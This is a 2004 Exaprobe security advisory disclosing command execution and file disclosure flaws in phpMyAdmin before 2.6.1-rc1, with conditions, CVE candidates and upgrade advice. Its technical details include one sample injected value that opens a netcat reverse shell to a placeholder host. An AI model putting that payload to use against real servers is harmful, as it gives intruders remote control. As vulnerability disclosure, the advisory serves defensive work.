 |
 |
| Multiple vulnerabilities in phpMyAdmin | ||
|
Exaprobe www.exaprobe.com Security Advisory Advisory Name: Multiple vulnerabilities in phpMyAdmin Release Date: 13 December 2004 Application: phpMyAdmin prior to 2.6.1-rc1 Platform: Any webserver running PHP Severity: Remote code execution Author: Nicolas Gregoire <ngregoire@exaprobe.com>, Vendor Status: Updated code is available CVE Candidates: CAN-2004-1147 and CAN-2004-1148 Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html Overview : ========== phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 47 languages. Technical details : =================== Command execution : - bug introduced in 2.6.0-pl2 - attacker does not need access to the phpMyAdmin interface - PHP safe mode must be off - external transformations must be activated - sample of offensive value : F\';nc -e /bin/sh -n mybox 80;echo \'A File disclosure : - attacker need access to the phpMyAdmin interface - PHP safe mode must be off - $cfg['UploadDir'] must be defined - exploitation is done via 'sql_localfile' Vendor Response : ================= After notification by Exaprobe, maintainers of the phpMyAdmin project have released version 2.6.1-rc1 which fixes these two vulnerabilities. Recommendation : ================ Upgrade to 2.6.1-rc1 or newer. Desactivate uploads and transformations if possible. CVE Information : ================= The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2004-1147 Command execution in phpMyAdmin CAN-2004-1148 File disclosure in phpMyAdmin |
||
©
2004 Exaprobe, SAS. All Rights Reserved |
||